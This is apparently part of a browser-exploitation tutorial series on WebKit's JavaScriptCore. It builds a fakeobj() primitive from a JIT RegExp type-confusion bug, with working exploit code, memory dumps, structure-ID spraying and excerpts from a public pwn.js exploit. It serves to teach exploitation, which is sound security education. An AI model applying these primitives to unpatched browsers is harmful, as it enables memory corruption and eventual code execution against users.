The fakeobj() Primitive: Turning an Address Leak into a Memory Corruption
TLDR
In this video we introduce the fakeobj() primitive. It's based on the bug used in addrof() and allows us to corrupt the memory of internal JavaScriptCore objects.
Series
- 0x00: New Series: Getting Into Browser Exploitation
- 0x01: Setup and Debug JavaScriptCore / WebKit
- 0x02: The Butterfly of JSObject
- 0x03: Just-in-time Compiler in JavaScriptCore
- 0x04: WebKit RegExp Exploit addrof() walk-through
- 0x05: The fakeobj() Primitive: Turning an Address Leak into a Memory Corruption
- 0x06: Revisiting JavaScriptCore Internals: boxed vs. unboxed
- 0x07: Preparing for Stage 2 of a WebKit Exploit
- 0x08: Arbitrary Read and Write in WebKit Exploit
Introduction
In the last blog post we saw how to leak the address of a JavaScript object; now it's time to see whether we can achieve memory corruption. Before jumping into the code, it's crucial that you have a basic understanding of what a JavaScript object looks like in memory (with inline properties and the butterfly), because in this post we will use that knowledge to turn a memory leak into a memory corruption.
You might wonder how we can turn this memory leak into something that lets us compromise the JavaScript engine. Well, it's not as easy as a simple buffer overflow where you get to control the instruction pointer directly. The bug we have here gives us some capabilities, but we need to do more to turn it into something powerful.
'fakeobj' Primitive
In saelo's article, he talks about two primitives: addrof and fakeobj. We've already used addrof to leak the address of an object in memory, so now let's look at fakeobj.
The fakeobj primitive works essentially the other way around. Here we inject native doubles into an array of JSValues, allowing us to create JSObject pointers.
Remember from the earlier post that JSValues are 64-bit values whose upper 16 bits act as a type tag. The 32-bit integers we looked at, for example, were stored with the highest bytes set to FFFF, as shown below.
Pointer {  0000:PPPP:PPPP:PPPP
         / 0001:****:****:****
Double  {         ...
         \ FFFE:****:****:****
Integer {  FFFF:0000:IIII:IIII
This is precisely how we found them in memory. However, when you add a JavaScript object to an array, the array stores a pointer, which is the address of that object. So if the addrof primitive uses this idea to read the pointer to an object as a double, can we also reverse it so that a double is interpreted as a pointer to an object? Well, that's precisely what we are going to do now.
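To make the tagging scheme a bit more tangible, here is a minimal Python sketch that classifies a 64-bit value by its upper 16 bits, following the diagram above. The function name classify_jsvalue is made up for this illustration, and the sketch deliberately ignores the other special values that a real engine also stores in the 0000 range, so treat it as a simplification rather than JavaScriptCore's actual logic.

```python
def classify_jsvalue(bits):
    """Classify a 64-bit JSValue by its top 16 bits (simplified model)."""
    tag = (bits >> 48) & 0xFFFF
    if tag == 0x0000:
        return "pointer"   # 0000:PPPP:PPPP:PPPP
    if tag == 0xFFFF:
        return "integer"   # FFFF:0000:IIII:IIII
    return "double"        # tags 0001 .. FFFE


print(classify_jsvalue(0x000062d0000d4080))  # pointer
print(classify_jsvalue(0xffff000000000001))  # integer
print(classify_jsvalue(0x0100160000001000))  # double
```

The interesting case for us is the first one: any 64-bit pattern with a zero tag is treated as a pointer, no matter how it got into the array.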
Let's copy the addrof code and start modifying it.
//
// fakeobj primitive
// Numbers in the comments represent the points listed below the code.
function fakeobj(dbl) { // (1) & (2)
    var array = [13.37];
    var reg = /abc/y;
    // Target function
    var AddrSetter = function(array) { // (4)
        "abc".match(reg);
        array[0] = dbl; // (3)
    }
    // Force optimization
    for (var i = 0; i < 100000; ++i)
        AddrSetter(array);
    // Setup haxx
    regexLastIndex = {};
    regexLastIndex.toString = function() {
        array[0] = {};
        return "0";
    };
    reg.lastIndex = regexLastIndex;
    // Do it!
    AddrSetter(array);
    return array[0]; // (5)
}
Here is what changed:
- (1) Changed the function name from addrof to fakeobj to match its primitive.
- (2) Changed the name of the argument from val to dbl, which stands for double.
- (3) Instead of reading and returning the first value of the array as a double, we write to it.
- (4) Changed the name of the inner function from AddrGetter to AddrSetter.
- (5) Instead of returning the result of the old AddrGetter, we just return the first element of the array.
It all starts with an array of doubles, and we JIT the code that's responsible for writing a double of our choice into the first element of that array: nothing special, totally normal. Then we prepare the bug with the toString function and call AddrSetter again. This executes the RegEx, which calls toString and assigns an object to the first element of the array. The JavaScript engine now converts the array from double storage (ArrayWithDouble) to contiguous storage (ArrayWithContiguous) and places a pointer to this new object into it. BUT the JIT-ed code still thinks that we have an array of doubles, so it writes a double of our choice into the first element, overwriting the pointer. If the double that overwrites the object address looks like a pointer, JavaScript will think that the first element of the array points to an object. Let's try this.
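The sequence of events can be sketched as a toy model in Python. Everything here (ToyArray, jitted_store, fakeobj_model, the placeholder address 0x7f0000001000) is hypothetical and only mimics the idea: one 64-bit slot, an indexing type that changes behind the back of a store routine that was compiled for doubles. It is not how JavaScriptCore is implemented.

```python
import struct


def double_to_bits(d):
    return struct.unpack("<Q", struct.pack("<d", d))[0]


def bits_to_double(bits):
    return struct.unpack("<d", struct.pack("<Q", bits))[0]


class ToyArray:
    """One 64-bit slot plus an indexing type (hypothetical model)."""

    def __init__(self, first_element):
        self.indexing_type = "double"
        self.slot = double_to_bits(first_element)  # raw, unboxed double bits

    def store_object(self, object_address):
        # Storing an object converts the array to contiguous JSValue storage.
        self.indexing_type = "contiguous"
        self.slot = object_address

    def load(self):
        if self.indexing_type == "double":
            return ("double", bits_to_double(self.slot))
        if self.slot >> 48 == 0:
            return ("object pointer", self.slot)
        return ("other JSValue", self.slot)


def jitted_store(array, dbl):
    # Stale JIT code: compiled for double arrays, it writes raw bits
    # without re-checking the indexing type.
    array.slot = double_to_bits(dbl)


def fakeobj_model(address):
    array = ToyArray(13.37)
    array.store_object(0x7f0000001000)  # side effect of toString (placeholder address)
    jitted_store(array, bits_to_double(address))
    return array.load()


kind, value = fakeobj_model(0x62d0000d40c0)
print(kind, hex(value))  # object pointer 0x62d0000d40c0
```

The load at the end sees contiguous storage and a zero tag, so in this model the attacker-chosen bits come back as an object pointer.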
The Fake Object
Let's try to craft an object, but first, let's run jsc with lldb attached and load our JavaScript file in interactive mode.
$ lldb ./jsc
(lldb) run -i ~/projects/webkit/test.js
Process 64142 launched: './jsc' (x86_64)
>>>
Let's keep this simple and create an object with a single property x, which is a simple integer.
>>> test = {}
[object Object]
>>> test.x = 1
1
>>> describe(test)
Object: 0x62d0000d4080 with butterfly 0x0 (Structure 0x62d000188310: [...])
# Hit CTRL + C
(lldb) x/4gx 0x62d0000d4080
0x62d0000d4080: 0x0100160000000126 0x0000000000000000
0x62d0000d4090: 0xffff000000000001 0x0000000000000000
Looking at the object, we see that the first 8 bytes, 0x0100160000000126, hold some flags and the Structure ID; together they form the JSCell header. Then we have the butterfly, which is null (0x0), followed by the inline property x, which we set to a 32-bit integer with the value 1. Keeping this in mind, let's try to fake such an object.
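If you want to pick the header apart yourself, here is a small Python sketch. It assumes the field order that appears in the comments of Linus's exploit further down in this post (a 4-byte structure ID followed by one byte each for indexing type, type, flags and cell state, little-endian); the exact layout may differ between WebKit versions, and the function and key names are made up for this example.

```python
import struct


def decode_jscell_header(header):
    """Split a 64-bit JSCell header into its fields (assumed layout)."""
    structure_id, indexing_type, cell_type, flags, cell_state = struct.unpack(
        "<IBBBB", struct.pack("<Q", header)
    )
    return {
        "structure_id": structure_id,
        "indexing_type": indexing_type,
        "type": cell_type,
        "flags": flags,
        "cell_state": cell_state,
    }


fields = decode_jscell_header(0x0100160000000126)
print(hex(fields["structure_id"]))  # 0x126
print(hex(fields["type"]))          # 0x16
```

Under that assumption, the low 32 bits are the Structure ID (0x126 for our test object) and the upper 32 bits are the per-cell flags we will later copy unchanged.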
One of the most clever parts of this exploit is that, while faking objects, we can abuse the fact that the first few properties of an object are inlined and not placed into the butterfly. But first let's see what such an object looks like in memory. Notice how the properties 1, 2, 3 show up?
>>> fake = {}
[object Object]
>>> fake.a = 1
1
>>> fake.b = 2
2
>>> fake.c = 3
3
>>> describe(fake)
Object: 0x62d0000d40c0 with butterfly 0x0 ...
# Hit CTRL + C
(lldb) x/6gx 0x62d0000d40c0
0x62d0000d40c0: 0x0100160000000129 0x0000000000000000
0x62d0000d40d0: 0xffff000000000001 0xffff000000000002
0x62d0000d40e0: 0xffff000000000003 0x0000000000000000
Now let's just test our primitive. We can use addrof to get the address, and then we use fakeobj on this address. This means hax should now be the same object as fake.
>>> addrof(fake)
5.36780059573753e-310
>>> hax = fakeobj(5.36780059573753e-310)
[object Object]
>>> hax.a
1
>>> hax.b
2
>>> hax.c
3
>>> describe(hax)
Object: 0x62d0000d40c0 with butterfly 0x0 ...
>>> describe(fake)
Object: 0x62d0000d40c0 with butterfly 0x0 ...
Cool. We can get the address of the fake object, and we can get the fake object back using our fakeobj primitive. But here comes the trick: we fully control the double that the JavaScript engine interprets as a pointer. So what if we add a tiny bit (+0x10) to that double value, which is the address of the fake object, so that the pointer is shifted forward and points 16 bytes further into the object, right at its first inline property?
If we use the fakeobj function now, JavaScript will treat the memory at the new offset as a JavaScript object. At the moment it doesn't look like a valid one, because the flags, the butterfly and the inline properties are missing. But since we control the inline properties, we can try to craft a valid JavaScript object out of them.
Let's start with the flags and the Structure ID. As you know, the Structure ID defines what kind of properties exist on an object. If we want to fake the test object with the property x from earlier, we need to use exactly the Structure ID of the test object.
Our test object looks like this:
# Flags and Structure ID | Butterfly
0x0100160000000126 0x0000000000000000
0xffff000000000001 0x0000000000000000
# Inline property `x` with the value `1`
So we want to write a fake header, with a Structure ID that matches a real Structure ID, into the first property. But since we don't have a handy function like describe in browsers, how are we supposed to read the Structure ID of the test object at run time? Well, we already know that a new structure, and with it a new Structure ID, is created every time we add a new property to an object. We can abuse this to spray structures and then guess a valid Structure ID.
We create a lot of these test objects with the property x, but also with an additional arbitrary property to force new Structure IDs. Basically, we spray test objects.
for (var i=0; i<0x1000; i++) {
    test = {}
    test.x = 1
    test['prop_' + i] = 2
}
2
>>> describe(test)
Object: 0x62d00089d300 with butterfly 0x0 (Structure ...:[Object, {x:0, prop_4095:1} ...])
If we look at the last test object that was created, we see that it has our x property and the additional arbitrary property, but most importantly it has a huge Structure ID. So if we pick a Structure ID of, let's say, 0x1000, we can be fairly certain that it belongs to one of those test objects. Theoretically this could fail, and the Structure ID might not belong to one of our test objects, but we can increase our chances by spraying more objects.
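Why the guess works can be illustrated with a toy model in Python. The ToyStructureTable class below is purely hypothetical: it assumes that every new property transition simply receives the next free ID, which matches the behaviour we observe with describe but is not taken from the engine's source. The starting IDs (1 for the empty object, 2 as the first free ID) are arbitrary placeholders; a real engine has already allocated many structures at startup.

```python
class ToyStructureTable:
    """Toy model: each new (parent, property) transition gets the next ID."""

    def __init__(self, root_id=1, first_free_id=2):
        self.root_id = root_id                 # structure of the empty object {}
        self.next_id = first_free_id
        self.transitions = {}                  # (parent_id, name) -> child_id
        self.properties = {root_id: ()}        # structure_id -> property names

    def add_property(self, parent_id, name):
        key = (parent_id, name)
        if key not in self.transitions:
            child_id = self.next_id
            self.next_id += 1
            self.transitions[key] = child_id
            self.properties[child_id] = self.properties[parent_id] + (name,)
        return self.transitions[key]


table = ToyStructureTable()
for i in range(0x1000):
    structure = table.add_property(table.root_id, "x")       # shared by all objects
    structure = table.add_property(structure, "prop_%d" % i)  # new ID every time

guess = 0x1000
print(table.properties[guess])  # ('x', 'prop_4093')
```

In this model the guessed ID lands on a structure that starts with x, which is all we need. If the IDs in a real engine start higher than our guess, the guess misses, which is why spraying more objects (and guessing inside the sprayed range) improves the odds.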
So now we want to craft the 64-bit value 0x0100160000001000, which combines the flags from the test object's header (0x01001600) with our guessed Structure ID (0x00001000). Since we are going to write it as a double, let's convert this 64-bit integer to a double.
>>> # This is python, not the jsc interpreter
>>> import struct
>>> struct.pack("Q", 0x0100160000001000)
b'\x00\x10\x00\x00\x00\x16\x00\x01'
>>> struct.unpack("d", struct.pack("Q", 0x0100160000001000))
(7.330283319472755e-304,)
Now this double should be a valid JSCell header for our fake object, and we can assign it to the property a.
>>> // this is javascript
>>> fake.a = 7.330283319472755e-304
7.330283319472755e-304
>>> describe(fake)
Object: 0x62d0000d40c0
// Hit CTRL + C
(lldb) x/6gx 0x62d0000d40c0
0x62d0000d40c0: 0x0100160000000129 0x0000000000000000
0x62d0000d40d0: 0x0101160000001000 0xffff000000000002
0x62d0000d40e0: 0xffff000000000003 0x0000000000000000
However, as you can see, our value is messed up a bit. Carefully compare the 0x0100160000001000 we wanted with the 0x0101160000001000 that ended up in memory: there's an additional 1 that shouldn't be there. This is due to the NaN-encoding for JSValues:
The scheme we have implemented encodes double precision values by performing a 64-bit integer addition of the value 2^48 to the number.
So basically the engine will add 2^48 = 0x1000000000000 to the bit pattern of our double, so we just have to subtract this value beforehand.
>>> # This is python
>>> struct.unpack("d", struct.pack("Q", 0x0100160000001000-0x1000000000000))
(7.082855106403439e-304,)
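Since we will need this conversion again, it can be handy to wrap both steps in small helpers. The following Python sketch is one way to do it; the names DOUBLE_ENCODE_OFFSET, stored_bits and double_for_stored_bits are chosen for this example, and stored_bits only models the 2^48 addition described in the quote above.

```python
import struct

DOUBLE_ENCODE_OFFSET = 1 << 48  # 0x1000000000000, the 2^48 from the quote


def bits_to_double(bits):
    return struct.unpack("<d", struct.pack("<Q", bits))[0]


def double_to_bits(d):
    return struct.unpack("<Q", struct.pack("<d", d))[0]


def stored_bits(d):
    """Model of what ends up in memory when a double is stored as a JSValue."""
    return double_to_bits(d) + DOUBLE_ENCODE_OFFSET


def double_for_stored_bits(target_bits):
    """Double to assign so that the stored JSValue equals target_bits."""
    return bits_to_double(target_bits - DOUBLE_ENCODE_OFFSET)


naive = bits_to_double(0x0100160000001000)
print("0x%016x" % stored_bits(naive))     # 0x0101160000001000 (the messed-up value)

fixed = double_for_stored_bits(0x0100160000001000)
print("0x%016x" % stored_bits(fixed))     # 0x0100160000001000
```

The first print reproduces the extra 1 we saw in lldb, the second shows that subtracting the offset up front cancels it out.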
Now let's try again.
>>> // this is javascript
>>> fake.a = 7.082855106403439e-304
7.082855106403439e-304
>>> describe(fake)
Object: 0x62d0000d40c0
// Hit CTRL + C
(lldb) x/6gx 0x62d0000d40c0
0x62d0000d40c0: 0x0100160000000129 0x0000000000000000
0x62d0000d40d0: 0x0100160000001000 0xffff000000000002
0x62d0000d40e0: 0xffff000000000003 0x0000000000000000
Now we have the right value, 0x0100160000001000. Next comes the butterfly, and we want this to be 0. But how can we do that if JavaScript adds ffff at the beginning of every integer? It's very simple: we can set the property to some value and then delete it, which throws the value away and leaves 0x0 in the slot.
>>> fake.b = 2
2
>>> delete fake.b
true
// Hit CTRL + C
(lldb) x/6gx 0x62d0000d40c0
0x62d0000d40c0: 0x0100160000000129 0x0000000000000000
0x62d0000d40d0: 0x0100160000001000 0x0000000000000000
0x62d0000d40e0: 0xffff000000000003 0x0000000000000000
The third property of our fake object becomes the first property of our fake test object, so we can set it to anything we want. How about 1337?
>>> fake.c = 1337
1337
// Hit CTRL + C
(lldb) x/6gx 0x62d0000d40c0
0x62d0000d40c0: 0x0100160000000129 0x0000000000000000
0x62d0000d40d0: 0x0100160000001000 0x0000000000000000
0x62d0000d40e0: 0xffff000000000539 0x0000000000000000
Now everything looks promising, so let's place all of this into our test.js script.
function fakeobj(dbl) {
    ...
}
for (var i=0; i<0x2000; i++) {
    test = {}
    test.x = 1
    test['prop_' + i] = 2
}
fake = {}
fake.a = 7.082855106403439e-304
fake.b = 2
fake.c = 1337
delete fake.b
print(addrof(fake)); // get the address of the fake object
Running this will print the address of the fake object as a double, as usual.
(lldb) run
5.367800960505e-310
(lldb) x/6gx 0x62d0007de880
0x62d0007de880: 0x010016000000212a 0x0000000000000000
0x62d0007de890: 0x0100160000001000 0x0000000000000000
0x62d0007de8a0: 0xffff000000000539 0x0000000000000000
5.367800960505e-310 is 0x62d0007de880, but we want to shift the pointer 16 bytes (0x10) further, so let's use python to do that.
>>> # This is python
>>> struct.unpack("d", struct.pack("Q", 0x62d0007de880 + 0x10))
(5.3678009605058e-310,)
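The same shift can be written as a tiny reusable helper. This is just a sketch with a made-up function name, shift_pointer_double; note that there is no 2^48 adjustment here, because in our setup both addrof and fakeobj move the value through the double array as raw, unboxed bits.

```python
import struct


def shift_pointer_double(addr_as_double, offset):
    """Reinterpret a double as a 64-bit address, add offset, convert back."""
    bits = struct.unpack("<Q", struct.pack("<d", addr_as_double))[0]
    return struct.unpack("<d", struct.pack("<Q", bits + offset))[0]


# The leaked address from above, expressed as the double addrof would return.
leaked = struct.unpack("<d", struct.pack("<Q", 0x62d0007de880))[0]
shifted = shift_pointer_double(leaked, 0x10)

shifted_bits = struct.unpack("<Q", struct.pack("<d", shifted))[0]
print(hex(shifted_bits))  # 0x62d0007de890
```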
Now let's use the fakeobj function to see if this created an object.
>>> // this is javascript
>>> hax = fakeobj(5.3678009605058e-310)
[object Object]
>>> hax.x
1337 // It works!
>>> describe(hax)
Object: 0x62d0007de890 with butterfly ...
There we go, we have an object at 0x62d0007de890, which means we made jsc think that hax is an object, even though its memory is really just the inline properties of our fake object. This means that changing a property on one affects the other.
>>> hax.x
1337
>>> fake.c = "LiveOverflow"
LiveOverflow
>>> hax.x
LiveOverflow
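The overlap is easier to see when you model the memory as a flat buffer. The Python sketch below is a simplified illustration (helper names are made up, and values are limited to tagged integers): fake occupies six quadwords starting at offset 0, and hax is simply a second view that starts 0x10 bytes later.

```python
import struct

INT_TAG = 0xFFFF << 48           # tag for 32-bit integers, as seen in lldb

memory = bytearray(0x30)         # the six quadwords of `fake`
FAKE = 0x00                      # base offset of fake
HAX = FAKE + 0x10                # hax starts at fake's first inline property


def write_qword(offset, value):
    struct.pack_into("<Q", memory, offset, value)


def read_qword(offset):
    return struct.unpack_from("<Q", memory, offset)[0]


# Layout of fake: header, butterfly, then inline properties a, b, c.
write_qword(FAKE + 0x00, 0x010016000000212a)   # real JSCell header of fake
write_qword(FAKE + 0x08, 0x0)                  # butterfly
write_qword(FAKE + 0x10, 0x0100160000001000)   # fake.a: crafted header of hax
write_qword(FAKE + 0x18, 0x0)                  # fake.b: deleted, hax's butterfly
write_qword(FAKE + 0x20, INT_TAG | 1337)       # fake.c


def hax_x():
    # First inline property of hax lives 0x10 bytes after hax's header.
    return read_qword(HAX + 0x10)


before = hax_x()
write_qword(FAKE + 0x20, INT_TAG | 42)         # fake.c = 42
after = hax_x()
print(before & 0xFFFFFFFF, after & 0xFFFFFFFF)  # 1337 42
```

Both names refer to the same bytes, so a write through fake.c is immediately visible as hax.x.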
This might seem a bit useless to you, but imagine the power we have now. We can craft arbitrary JavaScript objects and control their internals down to the memory level. This is not code execution yet, but the question we should ask ourselves is:
What JavaScript object could we fake that increases our capabilities?
At this point we could do some security research and try to find good objects ourselves, but since we are noobs and other awesome researchers have already asked this question and figured out answers, let's just follow them. So let's see what Linus does in his exploit.
Linus's way
- In pwn.js, he sprays a bunch of Float64Array structures in the same way we did.
var structs = [];
for (var i = 0; i < 0x5000; i++) {
    var a = new Float64Array(1);
    a['prop' + i] = 1337;
    structs.push(a);
}
- Then he also sprays a few WebAssembly.Memory objects and prepares some WebAssembly code.
for (var i = 0; i < 50; i++) {
    // `inital` is kept as spelled in the quoted code; the standard descriptor key is `initial`
    var a = new WebAssembly.Memory({inital: 0});
    a['prop' + i] = 1337;
    structs.push(a);
}
var webAssemblyCode = '\x00asm\x01\x00\x00\x00\x01\x0b\x02...';
var webAssemblyBuffer = str2ab(webAssemblyCode);
var webAssemblyModule = new WebAssembly.Module(webAssemblyBuffer);
- He also sets up the JSCell header using the Int64 class from the Int64.js library, which was written by saelo and which we are going to ignore for now. Basically, it just creates a fake JSCell header value, as we did with python.
var jsCellHeader = new Int64([
    0x00, 0x50, 0x00, 0x00, // m_structureID
    0x0,                    // m_indexingType
    0x2c,                   // m_type
    0x08,                   // m_flags
    0x1                     // m_cellState
]);
- Further down, he creates a new object called wasmBuffer whose first property is the jsCellHeader, like the first property a of our fake object. He also creates a butterfly property, which he deletes later on.
var wasmBuffer = {
    jsCellHeader: jsCellHeader.asJSValue(),
    butterfly: null,
    vector: null,
    memory: null,
    deleteMe: null
};
- He deletes the butterfly property, because he wants that slot to be 0.
delete wasmBuffer.butterfly
- Going further down, we see our first addrof, which leaks the address of the wasmBuffer object as a double.
var wasmBufferRawAddr = addrof(wasmBuffer);
- Now he shifts the pointer 16 bytes forward by adding 0x10 to the original address, just like we did.
var wasmBufferAddr = Add(Int64.fromDouble(wasmBufferRawAddr), 16);
- After that he uses the library code again to turn the address back into a double and passes it to the fakeobj function.
var fakeWasmBuffer = fakeobj(wasmBufferAddr.asDouble());
- Now he should get a fake Float64Array. But here's a trick. Remember that in the first two steps he sprayed Float64Array objects first and then a bunch of WebAssembly.Memory objects? It turns out he is not interested in the Float64Array at all.
- The while loop checks whether fakeWasmBuffer is not an instance of WebAssembly.Memory. But how does this make any sense when he deliberately chose a Structure ID to get a Float64Array? Well, he abuses the fact that the two objects overlap: the JSCell header of the fake wasmBuffer lives in the jsCellHeader property of the original wasmBuffer. When we changed the fake object's property with fake.c = "LiveOverflow", we saw that it directly changed the hax object as well. Here he keeps incrementing the jsCellHeader property of wasmBuffer, which changes the real Structure ID of the fake wasmBuffer.
while (!(fakeWasmBuffer instanceof WebAssembly.Memory)) {
    jsCellHeader.assignAdd(jsCellHeader, Int64.One);
    wasmBuffer.jsCellHeader = jsCellHeader.asJSValue();
}
- So in each iteration, he checks whether the fake wasmBuffer has turned into a WebAssembly.Memory object. Basically, he's brute-forcing Structure IDs in a safe way until he hits a WebAssembly.Memory structure. This is the reason why he sprayed many Float64Array objects first and only a few WebAssembly.Memory objects afterwards: spraying Float64Array objects is a much faster way to create many Structure IDs, so the initial guess is sure to land on a valid fake object, and the WebAssembly.Memory structures follow right after them.
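The brute-force idea from the steps above can be sketched as a toy model in Python. The ID ranges below are invented for illustration (we simply assume the 0x5000 Float64Array structures occupy one contiguous block of IDs starting at 0x200 and the 50 WebAssembly.Memory structures follow directly after), and find_structure_id is a hypothetical stand-in for the while loop, not Linus's code. The starting guess 0x5000 is the m_structureID from the jsCellHeader bytes 00 50 00 00, read as little-endian.

```python
import struct

# Starting guess: m_structureID bytes from the jsCellHeader, little-endian.
START_ID = struct.unpack("<I", bytes([0x00, 0x50, 0x00, 0x00]))[0]

# Invented layout of sprayed Structure IDs (assumption for this model only).
FLOAT64ARRAY_IDS = range(0x200, 0x200 + 0x5000)
WASM_MEMORY_IDS = range(FLOAT64ARRAY_IDS.stop, FLOAT64ARRAY_IDS.stop + 50)


def find_structure_id(start_id, is_target, is_valid):
    """Increment the guess until is_target(guess) holds.

    Every intermediate guess must be a valid structure, otherwise the
    real engine would crash on the instanceof check.
    """
    guess = start_id
    visited = []
    while not is_target(guess):
        if not is_valid(guess):
            raise RuntimeError("guess 0x%x is not a sprayed structure" % guess)
        visited.append(guess)
        guess += 1
    return guess, visited


found, visited = find_structure_id(
    START_ID,
    is_target=lambda i: i in WASM_MEMORY_IDS,
    is_valid=lambda i: i in FLOAT64ARRAY_IDS,
)
print(hex(START_ID), hex(found), len(visited))  # 0x5000 0x5200 512
```

In this model every guess before the hit is a sprayed Float64Array structure, which is what makes the search "safe": the loop never lands on an unallocated ID on its way to the first WebAssembly.Memory structure.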
Of course, this is still not arbitrary code execution, nor does it even begin to explain how we get there, but we will slowly work our way towards it. We have understood yet another crucial part.